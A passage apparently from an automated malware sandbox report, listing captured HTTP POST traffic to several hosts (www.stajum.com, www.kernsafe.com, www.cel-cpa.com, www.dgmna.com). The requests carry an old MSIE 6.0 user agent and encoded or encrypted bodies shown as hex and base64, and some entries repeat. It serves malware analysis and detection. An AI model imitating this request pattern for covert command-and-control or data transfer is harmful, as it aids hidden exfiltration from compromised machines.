6c 50 4d 51 73 6b 4d 75 4a 51 38 62 37 76 68 51 75 79 32 72 70 50 4d 43 72 79 62 36 4d 4d 52 5a 48 33 47 56 71 46 36 75 63 46 45 36 35 33 38 4f 61 2b 31 34 65 39 33 68 63 45 4c 63 73 6c 59 43 38 6a 49 6a 70 48 72 43 39 48 4f 64 30 65 59 75 46 72 36 63 61 6a 37 36 35 61 51 79 5a 62 37 76 42 77 74 4d 6d 48 78 50 38 55 4d 4f 76 2b 75 44 4f 72 72 35 68 52 6e 35 38 50 4a 35 74 44 75 57 36 70 4e 32 52 46 37 34 59 46 4a 59 78 73 59 6d 42 7a 4c 33 61 62 6f 47 32 46 2f 78 59 55 69 51 78 69 47 6e 32 50 44 58 4d 4a 76 30 68 30 35 47 4f 4d 55 6f 44 71 64 64 59 67 6c 46 36 30 4c 66 42 75 65 46 75 51 76 49 59 55 4d 61 71 57 2f 67 38 42 6e 67 67 30 5a 70 68 70 4b 73 2b 5a 62 4f 67 66 43 7a 66 78 4f 33 73 59 55 62 2b 45 74 41 44 58 43 51 59 64 4c 36 68 41 59 31 33 56 61 2b 52 6a 53 64 69 78 4e 49 4d 70 61 4e 6d 56 4c 4f 6f 41 74 71 58 2f 6f 33 72 64 65 42 7a 53 62 61 30 66 78 4b 53 59 63 50 35 65 6d 30 36 41 76 62 4b 64 52 54 6c 5a 71 63 6d 74 7a 32 70 4e 66 58 74 55 54 33 53 72 33 32 6d 76 69 65 46 42 33 57 62 71 65 61 78 61 75 4d 62 75 6c 41 61 35 55 75 61 64 78 36 4e 38 4c 61 6f 49 53 32 75 74 78 53 36 41 6e 2b 2f 58 48 47 31 37 6c 38 71 52 Data Ascii: ZFdwkO9SgIc91hOLDmNVWPjOHHYF+uG5k1F0zxG3yduvz9P1noiMEBrv6oFPca2b0msumQdB2Fag+vnKbLOXHLW/502TlnLnMx0rJ+fATxOtWuGRyF3CvTHnOoA5Eo0K30thb9qmc8uJ8pXDVuefH/iK+e6Tmw7xwy4rxzhXC5J2G0AdJsRS7Y2B6e2/yU0gUUsen35QQJMbfgn6+HcqD5ZUdclPMQskMuJQ8b7vhQuy2rpPMCryb6MMRZH3GVqF6ucFE6538Oa+14e93hcELcslYC8jIjpHrC9HOd0eYuFr6caj765aQyZb7vBwtMmHxP8UMOv+uDOrr5hRn58PJ5tDuW6pN2RF74YFJYxsYmBzL3aboG2F/xYUiQxiGn2PDXMJv0h05GOMUoDqddYglF60LfBueFuQvIYUMaqW/g8Bngg0ZphpKs+ZbOgfCzfxO3sYUb+EtADXCQYdL6hAY13Va+RjSdixNIMpaNmVLOoAtqX/o3rdeBzSba0fxKSYcP5em06AvbKdRTlZqcmtz2pNfXtUT3Sr32mvieFB3WbqeaxauMbulAa5Uuadx6N8LaoIS2utxS6An+/XHG17l8qR
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 63 77 51 38 6b 50 38 41 65 49 66 52 46 72 42 62 33 70 72 54 42 6f 68 33 72 50 5a 56 36 57 62 30 6f 31 68 65 48 73 41 62 62 31 57 72 45 65 4e 30 55 64 45 30 38 42 43 48 59 53 71 50 41 6b 5a 31 56 30 64 62 79 62 78 4f 33 39 72 44 6b 6d 2b 76 49 6f 4f 4d 77 56 69 75 2f 4b 6d 35 2f 63 52 4e 44 36 33 61 6e 6d 75 4c 4f 34 4a 41 78 72 71 72 56 68 4d 34 47 47 7a 4b 65 52 7a 6b 52 44 79 49 72 46 5a 49 49 50 6d 39 43 65 2f 50 4e 70 7a 45 36 70 33 73 51 47 56 76 77 78 2f 6d 67 67 59 6c 77 42 54 76 55 65 49 45 2b 41 2f 38 4b 4b 4d 4c 79 6a 65 34 44 70 32 7a 47 6d 59 6e 76 6d 46 35 68 35 39 30 69 6b 44 63 5a 4c 65 63 6d 76 6e 51 4a 4e 42 51 46 50 6b 78 36 38 45 34 2b 4b 72 31 4a 41 4a 38 5a 43 68 39 70 2f 39 56 30 57 5a 77 2b 74 70 44 62 6f 41 63 6d 71 47 72 53 69 74 62 57 47 65 43 54 37 59 62 53 76 50 35 79 54 34 42 62 39 55 45 63 39 4e 5a 32 79 6b 4d 6e 71 42 5a 6d 61 6d 79 55 70 51 78 48 30 52 77 53 4b 47 2b 58 54 34 5a 6d 61 67 2b 6c 70 37 2f 52 49 77 51 59 76 68 63 43 45 63 67 68 32 30 70 56 55 75 32 72 67 54 53 4f 71 61 64 42 35 65 70 50 75 79 2f 44 45 59 70 4c 65 42 66 42 31 7a 69 78 61 67 30 54 4d 57 2f 31 74 6a 2b 6e 62 71 2b 61 76 35 44 36 55 42 36 63 59 4b 47 37 42 5a 52 70 54 58 62 56 68 6f 44 59 33 6f 6b 77 66 31 4d 6a 61 78 71 6a 4f 6d 64 67 4f 76 52 41 38 65 4d 55 2b 30 72 2b 6f 76 55 49 6a 56 31 43 58 4c 63 6e 6b 67 56 76 61 5a 39 6e 6d 44 34 75 76 6d 74 64 45 59 2b 6a 58 66 44 46 41 6b 36 4a 59 44 36 33 63 5a 64 53 79 74 70 42 65 48 67 44 66 31 77 32 38 72 52 53 45 43 66 79 69 57 75 53 58 44 67 64 4d 76 43 79 70 2b 59 57 6e 66 36 35 74 37 68 41 75 70 6c 59 4e 75 65 34 4f 4b 6c 62 38 75 38 67 64 4b 59 7a 6a 65 41 76 52 75 41 6c 42 6e 30 44 41 62 68 6c 78 65 79 69 70 4a 7a 70 61 56 36 6c 56 79 32 53 32 68 55 6f 73 56 61 42 41 3d 3d Data Ascii: cwQ8kP8AeIfRFrBb3prTBoh3rPZV6Wb0o1heHsAbb1WrEeN0UdE08BCHYSqPAkZ1V0dbybxO39rDkm+vIoOMwViu/Km5/cRND63anmuLO4JAxrqrVhM4GGzKeRzkRDyIrFZIIPm9Ce/PNpzE6p3sQGVvwx/mggYlwBTvUeIE+A/8KKMLyje4Dp2zGmYnvmF5h590ikDcZLecmvnQJNBQFPkx68E4+Kr1JAJ8ZCh9p/9V0WZw+tpDboAcmqGrSitbWGeCT7YbSvP5yT4Bb9UEc9NZ2ykMnqBZmamyUpQxH0RwSKG+XT4Zmag+lp7/RIwQYvhcCEcgh20pVUu2rgTSOqadB5epPuy/DEYpLeBfB1zixag0TMW/1tj+nbq+av5D6UB6cYKG7BZRpTXbVhoDY3okwf1MjaxqjOmdgOvRA8eMU+0r+ovUIjV1CXLcnkgVvaZ9nmD4uvmtdEY+jXfDFAk6JYD63cZdSytpBeHgDf1w28rRSECfyiWuSXDgdMvCyp+YWnf65t7hAuplYNue4OKlb8u8gdKYzjeAvRuAlBn0DAbhlxeyipJzpaV6lVy2S2hUosVaBA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 79 68 7a 32 65 6d 47 67 66 34 65 46 74 36 38 41 77 4c 35 4a 6f 54 72 6e 61 32 52 66 63 51 4b 32 4a 52 58 54 79 6b 4b 67 6c 77 4f 68 61 61 2b 68 6c 6b 62 34 6c 37 77 65 64 64 38 48 79 32 79 33 79 32 4c 44 35 30 72 45 44 61 4d 62 5a 76 47 50 41 73 4d 41 78 65 66 4b 6c 35 71 68 52 42 6d 43 4b 68 38 4a 32 6f 76 6f 5a 65 79 47 44 46 6a 39 6a 44 75 6e 2f 59 44 33 43 41 43 45 6e 37 37 78 5a 77 36 56 35 6e 79 74 41 68 5a 64 73 5a 70 4d 41 37 72 34 5a 7a 47 44 39 78 6c 6e 36 41 7a 74 6c 4f 66 49 66 57 75 76 30 44 74 64 4a 4f 50 49 4d 53 7a 62 41 54 4f 67 6f 6f 50 34 30 34 53 6a 70 6c 6b 33 63 61 30 4f 56 4f 79 69 52 43 4c 57 46 53 34 62 52 44 6f 52 48 6d 58 53 71 41 39 55 37 53 6e 36 57 49 41 56 32 47 49 30 6d 31 55 6f 64 70 4f 30 56 75 76 41 7a 72 4b 54 65 79 34 61 37 6d 4d 48 58 7a 2b 46 48 69 4a 48 4d 65 54 67 72 54 48 72 59 76 65 6a 75 77 2f 74 6e 7a 54 52 6b 34 30 33 73 4e 2b 34 77 77 61 37 50 6f 66 41 7a 64 74 44 70 68 69 6f 69 43 42 76 70 4b 36 31 31 76 72 57 34 67 4f 65 48 44 79 67 55 64 74 61 6f 35 32 4b 49 65 45 34 59 64 78 59 2b 58 79 49 6e 6b 44 6f 6a 78 68 43 4e 50 73 4a 35 70 64 7a 47 36 33 43 65 46 50 76 38 51 4a 48 47 45 4e 43 66 66 54 54 43 70 58 72 32 69 63 4a 2b 59 72 35 75 41 4e 35 54 43 4c 43 4a 42 35 63 7a 39 68 73 76 76 50 33 37 61 32 5a 30 6c 5a 47 57 51 6d 70 50 53 65 78 35 33 33 35 7a 59 6d 32 47 70 43 56 6a 50 59 34 6e 58 74 35 2b 36 76 4a 35 54 65 41 50 34 43 6a 33 78 46 63 71 35 31 68 36 66 67 6c 51 57 4a 64 55 4b 78 4a 5a 5a 6a 39 42 79 65 36 45 6a 74 6e 33 73 56 63 61 41 70 41 4b 49 50 50 4b 32 5a 31 39 56 48 39 68 35 45 63 4c 54 6d 53 62 66 6c 32 79 4b 6a 7a 6e 41 69 73 74 78 53 57 39 78 63 79 41 37 73 50 4b 54 5a 6f 4c 36 62 36 61 66 63 71 54 72 45 47 Data Ascii: yhz2emGgf4eFt68AwL5JoTrna2RfcQK2JRXTykKglwOhaa+hlkb4l7wedd8Hy2y3y2LD50rEDaMbZvGPAsMAxefKl5qhRBmCKh8J2ovoZeyGDFj9jDun/YD3CACEn77xZw6V5nytAhZdsZpMA7r4ZzGD9xln6AztlOfIfWuv0DtdJOPIMSzbATOgooP404Sjplk3ca0OVOyiRCLWFS4bRDoRHmXSqA9U7Sn6WIAV2GI0m1UodpO0VuvAzrKTey4a7mMHXz+FHiJHMeTgrTHrYvejuw/tnzTRk403sN+4wwa7PofAzdtDphioiCBvpK611vrW4gOeHDygUdtao52KIeE4YdxY+XyInkDojxhCNPsJ5pdzG63CeFPv8QJHGENCffTTCpXr2icJ+Yr5uAN5TCLCJB5cz9hsvvP37a2Z0lZGWQmpPSex5335zYm2GpCVjPY4nXt5+6vJ5TeAP4Cj3xFcq51h6fglQWJdUKxJZZj9Bye6Ejtn3sVcaApAKIPPK2Z19VH9h5EcLTmSbfl2yKjznAistxSW9xcyA7sPKTZoL6b6afcqTrEG
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 63 77 51 38 6b 50 38 41 65 49 66 52 46 72 42 62 33 70 72 54 42 6f 68 33 72 50 5a 56 36 57 62 30 6f 31 68 65 48 73 41 62 62 31 57 72 45 65 4e 30 55 64 45 30 38 42 43 48 59 53 71 50 41 6b 5a 31 56 30 64 62 79 62 78 4f 33 39 72 44 6b 6d 2b 76 49 6f 4f 4d 77 56 69 75 2f 4b 6d 35 2f 63 52 4e 44 36 33 61 6e 6d 75 4c 4f 34 4a 41 78 72 71 72 56 68 4d 34 47 47 7a 4b 65 52 7a 6b 52 44 79 49 72 46 5a 49 49 50 6d 39 43 65 2f 50 4e 70 7a 45 36 70 33 73 51 47 56 76 77 78 2f 6d 67 67 59 6c 77 42 54 76 55 65 49 45 2b 41 2f 38 4b 4b 4d 4c 79 6a 65 34 44 70 32 7a 47 6d 59 6e 76 6d 46 35 68 35 39 30 69 6b 44 63 5a 4c 65 63 6d 76 6e 51 4a 4e 42 51 46 50 6b 78 36 38 45 34 2b 4b 72 31 4a 41 4a 38 5a 43 68 39 70 2f 39 56 30 57 5a 77 2b 74 70 44 62 6f 41 63 6d 71 47 72 53 69 74 62 57 47 65 43 54 37 59 62 53 76 50 35 79 54 34 42 62 39 55 45 63 39 4e 5a 32 79 6b 4d 6e 71 42 5a 6d 61 6d 79 55 70 51 78 48 30 52 77 53 4b 47 2b 58 54 34 5a 6d 61 67 2b 6c 70 37 2f 52 49 77 51 59 76 68 63 43 45 63 67 68 32 30 70 56 55 75 32 72 67 54 53 4f 71 61 64 42 35 65 70 50 75 79 2f 44 45 59 70 4c 65 42 66 42 31 7a 69 78 61 67 30 54 4d 57 2f 31 74 6a 2b 6e 62 71 2b 61 76 35 44 36 55 42 36 63 59 4b 47 37 42 5a 52 70 54 58 62 56 68 6f 44 59 33 6f 6b 77 66 31 4d 6a 61 78 71 6a 4f 6d 64 67 4f 76 52 41 38 65 4d 55 2b 30 72 2b 6f 76 55 49 6a 56 31 43 58 4c 63 6e 6b 67 56 76 61 5a 39 6e 6d 44 34 75 76 6d 74 64 45 59 2b 6a 58 66 44 46 41 6b 36 4a 59 44 36 33 63 5a 64 53 79 74 70 42 65 48 67 44 66 31 77 32 38 72 52 53 45 43 66 79 69 57 75 53 58 44 67 64 4d 76 43 79 70 2b 59 57 6e 66 36 35 74 37 68 41 75 70 6c 59 4e 75 65 34 4f 4b 6c 62 38 75 38 67 64 4b 59 7a 6a 65 41 76 52 75 41 6c 42 6e 30 44 41 62 68 6c 78 65 79 69 70 4a 7a 70 61 56 36 6c 56 79 32 53 32 68 55 6f 73 56 61 42 41 3d 3d Data Ascii: cwQ8kP8AeIfRFrBb3prTBoh3rPZV6Wb0o1heHsAbb1WrEeN0UdE08BCHYSqPAkZ1V0dbybxO39rDkm+vIoOMwViu/Km5/cRND63anmuLO4JAxrqrVhM4GGzKeRzkRDyIrFZIIPm9Ce/PNpzE6p3sQGVvwx/mggYlwBTvUeIE+A/8KKMLyje4Dp2zGmYnvmF5h590ikDcZLecmvnQJNBQFPkx68E4+Kr1JAJ8ZCh9p/9V0WZw+tpDboAcmqGrSitbWGeCT7YbSvP5yT4Bb9UEc9NZ2ykMnqBZmamyUpQxH0RwSKG+XT4Zmag+lp7/RIwQYvhcCEcgh20pVUu2rgTSOqadB5epPuy/DEYpLeBfB1zixag0TMW/1tj+nbq+av5D6UB6cYKG7BZRpTXbVhoDY3okwf1MjaxqjOmdgOvRA8eMU+0r+ovUIjV1CXLcnkgVvaZ9nmD4uvmtdEY+jXfDFAk6JYD63cZdSytpBeHgDf1w28rRSECfyiWuSXDgdMvCyp+YWnf65t7hAuplYNue4OKlb8u8gdKYzjeAvRuAlBn0DAbhlxeyipJzpaV6lVy2S2hUosVaBA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 6a 32 75 54 54 61 38 45 4b 34 65 75 52 69 68 6a 7a 75 71 53 73 72 67 6d 72 62 66 46 37 75 77 69 55 30 64 48 61 5a 51 69 72 6a 4b 78 73 50 35 47 42 50 72 37 56 56 65 68 6f 44 65 66 7a 46 71 53 7a 34 43 47 79 4e 77 30 77 35 46 71 78 78 48 75 73 2b 61 39 6e 4e 63 48 42 63 79 32 74 52 67 45 79 48 36 59 34 56 42 2b 6e 47 6c 58 38 45 51 63 54 48 47 31 74 66 56 52 36 6f 78 39 68 46 50 39 43 66 46 57 67 68 44 55 71 2f 50 49 4d 78 7a 57 45 59 4d 4d 65 35 55 5a 69 68 47 48 53 63 4b 6f 64 7a 73 59 66 6d 36 41 45 64 51 53 38 71 45 32 65 42 6f 52 6a 31 6e 63 64 67 41 75 70 2f 34 2b 32 61 72 42 4e 34 43 49 6c 45 53 65 79 4b 78 6b 42 32 34 76 33 6d 32 41 5a 2f 46 55 79 72 50 2f 30 71 75 6e 39 6f 39 4d 36 2b 6b 44 51 6a 55 57 2b 32 46 54 38 4e 35 72 4e 67 7a 62 32 52 54 61 6a 44 41 59 62 58 70 50 34 57 31 4d 6d 55 56 49 4a 63 37 46 51 6c 30 43 6d 34 4d 5a 66 51 31 54 47 44 44 7a 52 63 58 44 4f 43 78 52 52 54 7a 54 79 36 4f 48 58 43 36 41 52 54 43 72 43 30 54 6c 39 77 53 34 78 58 44 75 56 4e 63 61 78 34 35 32 43 51 62 49 53 42 66 2b 66 30 6f 62 52 68 65 4e 4e 69 41 37 47 47 5a 5a 32 5a 7a 57 4e 51 46 48 45 68 7a 5a 49 79 33 63 49 55 6d 2f 51 4a 4e 72 75 38 54 35 64 56 4d 52 66 6e 46 52 45 65 5a 43 59 7a 44 6f 59 31 74 62 62 43 39 48 66 72 59 37 37 70 44 70 56 44 62 68 37 68 69 2b 30 32 68 64 6b 77 54 33 68 6f 5a 58 76 4f 56 30 72 49 55 54 47 56 2f 54 36 72 79 53 34 61 57 65 45 39 2f 6d 4d 62 48 4f 63 6b 37 76 66 36 57 6f 4b 54 34 33 42 72 65 6c 35 5a 70 6b 79 31 62 66 42 4b 4c 30 49 53 6d 35 33 72 58 58 39 52 6f 2b 7a 53 4f 76 34 4c 45 4f 35 77 78 4b 4f 65 4b 51 55 48 43 35 46 7a 62 58 35 55 4f 70 42 75 65 49 53 42 6d 2f 71 4d 43 67 33 43 30 3d Data Ascii: j2uTTa8EK4euRihjzuqSsrgmrbfF7uwiU0dHaZQirjKxsP5GBPr7VVehoDefzFqSz4CGyNw0w5FqxxHus+a9nNcHBcy2tRgEyH6Y4VB+nGlX8EQcTHG1tfVR6ox9hFP9CfFWghDUq/PIMxzWEYMMe5UZihGHScKodzsYfm6AEdQS8qE2eBoRj1ncdgAup/4+2arBN4CIlESeyKxkB24v3m2AZ/FUyrP/0qun9o9M6+kDQjUW+2FT8N5rNgzb2RTajDAYbXpP4W1MmUVIJc7FQl0Cm4MZfQ1TGDDzRcXDOCxRRTzTy6OHXC6ARTCrC0Tl9wS4xXDuVNcax452CQbISBf+f0obRheNNiA7GGZZ2ZzWNQFHEhzZIy3cIUm/QJNru8T5dVMRfnFREeZCYzDoY1tbbC9HfrY77pDpVDbh7hi+02hdkwT3hoZXvOV0rIUTGV/T6ryS4aWeE9/mMbHOck7vf6WoKT43Brel5Zpky1bfBKL0ISm53rXX9Ro+zSOv4LEO5wxKOeKQUHC5FzbX5UOpBueISBm/qMCg3C0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 6a 32 75 54 54 61 38 45 4b 34 65 75 52 69 68 6a 7a 75 71 53 73 72 67 6d 72 62 66 46 37 75 77 69 55 30 64 48 61 5a 51 69 72 6a 4b 78 73 50 35 47 42 50 72 37 56 56 65 68 6f 44 65 66 7a 46 71 53 7a 34 43 47 79 4e 77 30 77 35 46 71 78 78 48 75 73 2b 61 39 6e 4e 63 48 42 63 79 32 74 52 67 45 79 48 36 59 34 56 42 2b 6e 47 6c 58 38 45 51 63 54 48 47 31 74 66 56 52 36 6f 78 39 68 46 50 39 43 66 46 57 67 68 44 55 71 2f 50 49 4d 78 7a 57 45 59 4d 4d 65 35 55 5a 69 68 47 48 53 63 4b 6f 64 7a 73 59 66 6d 36 41 45 64 51 53 38 71 45 32 65 42 6f 52 6a 31 6e 63 64 67 41 75 70 2f 34 2b 32 61 72 42 4e 34 43 49 6c 45 53 65 79 4b 78 6b 42 32 34 76 33 6d 32 41 5a 2f 46 55 79 72 50 2f 30 71 75 6e 39 6f 39 4d 36 2b 6b 44 51 6a 55 57 2b 32 46 54 38 4e 35 72 4e 67 7a 62 32 52 54 61 6a 44 41 59 62 58 70 50 34 57 31 4d 6d 55 56 49 4a 63 37 46 51 6c 30 43 6d 34 4d 5a 66 51 31 54 47 44 44 7a 52 63 58 44 4f 43 78 52 52 54 7a 54 79 36 4f 48 58 43 36 41 52 54 43 72 43 30 54 6c 39 77 53 34 78 58 44 75 56 4e 63 61 78 34 35 32 43 51 62 49 53 42 66 2b 66 30 6f 62 52 68 65 4e 4e 69 41 37 47 47 5a 5a 32 5a 7a 57 4e 51 46 48 45 68 7a 5a 49 79 33 63 49 55 6d 2f 51 4a 4e 72 75 38 54 35 64 56 4d 52 66 6e 46 52 45 65 5a 43 59 7a 44 6f 59 31 74 62 62 43 39 48 66 72 59 37 37 70 44 70 56 44 62 68 37 68 69 2b 30 32 68 64 6b 77 54 33 68 6f 5a 58 76 4f 56 30 72 49 55 54 47 56 2f 54 36 72 79 53 34 61 57 65 45 39 2f 6d 4d 62 48 4f 63 6b 37 76 66 36 57 6f 4b 54 34 33 42 72 65 6c 35 5a 70 6b 79 31 62 66 42 4b 4c 30 49 53 6d 35 33 72 58 58 39 52 6f 2b 7a 53 4f 76 34 4c 45 4f 35 77 78 4b 4f 65 4b 51 55 48 43 35 46 7a 62 58 35 55 4f 70 42 75 65 49 53 42 6d 2f 71 4d 43 67 33 43 30 3d Data Ascii: j2uTTa8EK4euRihjzuqSsrgmrbfF7uwiU0dHaZQirjKxsP5GBPr7VVehoDefzFqSz4CGyNw0w5FqxxHus+a9nNcHBcy2tRgEyH6Y4VB+nGlX8EQcTHG1tfVR6ox9hFP9CfFWghDUq/PIMxzWEYMMe5UZihGHScKodzsYfm6AEdQS8qE2eBoRj1ncdgAup/4+2arBN4CIlESeyKxkB24v3m2AZ/FUyrP/0qun9o9M6+kDQjUW+2FT8N5rNgzb2RTajDAYbXpP4W1MmUVIJc7FQl0Cm4MZfQ1TGDDzRcXDOCxRRTzTy6OHXC6ARTCrC0Tl9wS4xXDuVNcax452CQbISBf+f0obRheNNiA7GGZZ2ZzWNQFHEhzZIy3cIUm/QJNru8T5dVMRfnFREeZCYzDoY1tbbC9HfrY77pDpVDbh7hi+02hdkwT3hoZXvOV0rIUTGV/T6ryS4aWeE9/mMbHOck7vf6WoKT43Brel5Zpky1bfBKL0ISm53rXX9Ro+zSOv4LEO5wxKOeKQUHC5FzbX5UOpBueISBm/qMCg3C0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 61 30 34 33 6a 55 62 67 62 59 59 75 34 42 31 43 59 54 6f 31 76 6d 6c 64 77 74 75 6d 55 33 6b 6f 32 69 43 71 61 77 6a 6e 73 32 4a 6f 62 48 5a 5a 4c 51 2b 6a 36 6e 32 4f 72 52 72 4f 4e 64 77 49 58 73 4b 76 59 4d 44 7a 32 55 4d 56 74 2f 6e 31 33 65 69 49 77 50 46 62 58 4c 7a 39 6a 69 71 33 42 6b 54 52 63 56 51 51 36 43 2b 4a 36 72 75 77 38 63 41 50 41 6d 54 37 4f 31 39 72 34 30 38 55 4c 70 64 34 33 72 58 2b 31 6e 58 2f 71 52 43 35 77 4d 38 4e 52 7a 7a 6b 54 6d 59 6d 7a 4e 37 35 62 49 6e 69 52 44 6e 44 7a 37 4c 2b 45 6b 4f 2f 67 35 63 52 61 49 2b 39 32 68 30 61 66 66 61 54 39 51 6f 5a 47 34 4e 4c 78 5a 6b 35 6d 58 58 75 42 53 70 65 2b 62 69 57 47 54 69 6e 36 54 67 47 47 2b 53 30 6e 4a 68 4c 6c 38 71 67 58 42 4d 7a 66 51 52 59 45 53 78 35 43 44 6d 62 42 34 6d 53 32 57 58 4f 77 6f 77 32 47 56 46 4e 43 66 34 79 39 59 46 34 65 70 43 55 2b 62 37 56 75 75 66 49 54 61 62 6d 68 45 33 62 6c 46 55 59 52 35 67 70 71 38 49 34 37 5a 46 73 38 67 65 32 4c 41 69 59 6a 77 53 4c 4b 34 72 4d 6a 67 4e 65 35 67 52 67 68 41 44 37 55 66 66 2b 34 65 32 68 65 2f 71 59 48 45 30 57 50 69 78 44 61 4c 57 4c 68 6d 49 71 2f 66 64 44 53 32 79 4b 52 71 74 38 75 58 70 30 76 65 7a 48 7a 34 55 53 53 42 64 4b 35 75 4f 32 4d 48 52 39 49 7a 66 76 68 41 39 52 6e 44 49 47 76 39 48 41 69 69 6f 39 73 78 46 47 39 6e 31 38 59 68 74 4f 49 6a 2b 74 73 4e 66 44 68 50 6f 31 78 37 50 55 38 33 44 75 6d 65 4c 45 41 4d 73 36 39 52 51 31 46 63 6b 6a 55 50 6b 4e 6b 6d 6d 77 4f 4d 37 70 50 2f 47 45 46 6e 61 52 57 4d 36 47 59 74 48 57 62 52 30 43 52 75 47 75 4f 4d 4f 5a 79 78 35 78 30 6e 64 63 44 70 62 57 30 32 30 62 64 46 50 63 58 65 49 48 50 79 58 44 69 61 6c 38 52 70 53 79 6b 37 55 56 56 7a 54 70 34 31 63 42 77 68 48 52 72 42 54 47 58 67 48 38 66 62 75 30 71 41 51 52 4a 4c 4d 5a 34 6c 50 7a 59 4d 59 70 44 51 44 74 36 67 54 34 62 65 77 3d Data Ascii: a043jUbgbYYu4B1CYTo1vmldwtumU3ko2iCqawjns2JobHZZLQ+j6n2OrRrONdwIXsKvYMDz2UMVt/n13eiIwPFbXLz9jiq3BkTRcVQQ6C+J6ruw8cAPAmT7O19r408ULpd43rX+1nX/qRC5wM8NRzzkTmYmzN75bIniRDnDz7L+EkO/g5cRaI+92h0affaT9QoZG4NLxZk5mXXuBSpe+biWGTin6TgGG+S0nJhLl8qgXBMzfQRYESx5CDmbB4mS2WXOwow2GVFNCf4y9YF4epCU+b7VuufITabmhE3blFUYR5gpq8I47ZFs8ge2LAiYjwSLK4rMjgNe5gRghAD7Uff+4e2he/qYHE0WPixDaLWLhmIq/fdDS2yKRqt8uXp0vezHz4USSBdK5uO2MHR9IzfvhA9RnDIGv9HAiio9sxFG9n18YhtOIj+tsNfDhPo1x7PU83DumeLEAMs69RQ1FckjUPkNkmmwOM7pP/GEFnaRWM6GYtHWbR0CRuGuOMOZyx5x0ndcDpbW020bdFPcXeIHPyXDial8RpSyk7UVVzTp41cBwhHRrBTGXgH8fbu0qAQRJLMZ4lPzYMYpDQDt6gT4bew=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 61 30 34 33 6a 55 62 67 62 59 59 75 34 42 31 43 59 54 6f 31 76 6d 6c 64 77 74 75 6d 55 33 6b 6f 32 69 43 71 61 77 6a 6e 73 32 4a 6f 62 48 5a 5a 4c 51 2b 6a 36 6e 32 4f 72 52 72 4f 4e 64 77 49 58 73 4b 76 59 4d 44 7a 32 55 4d 56 74 2f 6e 31 33 65 69 49 77 50 46 62 58 4c 7a 39 6a 69 71 33 42 6b 54 52 63 56 51 51 36 43 2b 4a 36 72 75 77 38 63 41 50 41 6d 54 37 4f 31 39 72 34 30 38 55 4c 70 64 34 33 72 58 2b 31 6e 58 2f 71 52 43 35 77 4d 38 4e 52 7a 7a 6b 54 6d 59 6d 7a 4e 37 35 62 49 6e 69 52 44 6e 44 7a 37 4c 2b 45 6b 4f 2f 67 35 63 52 61 49 2b 39 32 68 30 61 66 66 61 54 39 51 6f 5a 47 34 4e 4c 78 5a 6b 35 6d 58 58 75 42 53 70 65 2b 62 69 57 47 54 69 6e 36 54 67 47 47 2b 53 30 6e 4a 68 4c 6c 38 71 67 58 42 4d 7a 66 51 52 59 45 53 78 35 43 44 6d 62 42 34 6d 53 32 57 58 4f 77 6f 77 32 47 56 46 4e 43 66 34 79 39 59 46 34 65 70 43 55 2b 62 37 56 75 75 66 49 54 61 62 6d 68 45 33 62 6c 46 55 59 52 35 67 70 71 38 49 34 37 5a 46 73 38 67 65 32 4c 41 69 59 6a 77 53 4c 4b 34 72 4d 6a 67 4e 65 35 67 52 67 68 41 44 37 55 66 66 2b 34 65 32 68 65 2f 71 59 48 45 30 57 50 69 78 44 61 4c 57 4c 68 6d 49 71 2f 66 64 44 53 32 79 4b 52 71 74 38 75 58 70 30 76 65 7a 48 7a 34 55 53 53 42 64 4b 35 75 4f 32 4d 48 52 39 49 7a 66 76 68 41 39 52 6e 44 49 47 76 39 48 41 69 69 6f 39 73 78 46 47 39 6e 31 38 59 68 74 4f 49 6a 2b 74 73 4e 66 44 68 50 6f 31 78 37 50 55 38 33 44 75 6d 65 4c 45 41 4d 73 36 39 52 51 31 46 63 6b 6a 55 50 6b 4e 6b 6d 6d 77 4f 4d 37 70 50 2f 47 45 46 6e 61 52 57 4d 36 47 59 74 48 57 62 52 30 43 52 75 47 75 4f 4d 4f 5a 79 78 35 78 30 6e 64 63 44 70 62 57 30 32 30 62 64 46 50 63 58 65 49 48 50 79 58 44 69 61 6c 38 52 70 53 79 6b 37 55 56 56 7a 54 70 34 31 63 42 77 68 48 52 72 42 54 47 58 67 48 38 66 62 75 30 71 41 51 52 4a 4c 4d 5a 34 6c 50 7a 59 4d 59 70 44 51 44 74 36 67 54 34 62 65 77 3d Data Ascii: 